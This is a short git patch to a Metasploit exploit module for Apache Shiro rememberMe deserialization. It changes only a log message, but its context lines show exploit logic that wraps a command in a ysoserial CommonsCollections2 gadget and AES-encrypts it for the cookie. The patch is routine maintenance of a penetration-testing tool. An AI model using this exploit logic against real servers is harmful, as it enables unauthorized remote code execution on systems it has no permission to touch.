From 1116635477d8d168131048e52d055eeac7b0630a Mon Sep 17 00:00:00 2001 From: L Date: Mon, 4 Feb 2019 20:21:49 +0800 Subject: [PATCH] fixed --- .../exploits/multi/http/shiro_rememberme_v124_deserialize.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/shiro_rememberme_v124_deserialize.rb b/modules/exploits/multi/http/shiro_rememberme_v124_deserialize.rb index 86e0d0c2ff..b6a8ecde2a 100644 --- a/modules/exploits/multi/http/shiro_rememberme_v124_deserialize.rb +++ b/modules/exploits/multi/http/shiro_rememberme_v124_deserialize.rb @@ -57,7 +57,7 @@ class MetasploitModule < Msf::Exploit::Remote def exploit cmd = payload.encoded - vprint_status(cmd) + vprint_status("Execute CMD: #{cmd}") type = ( target.name == 'Unix Command payload' ? 'bash' : 'cmd' ) java_payload = ::Msf::Util::JavaDeserialization.ysoserial_payload('CommonsCollections2', cmd, modified_type: type) ciphertext = aes_encrypt(java_payload)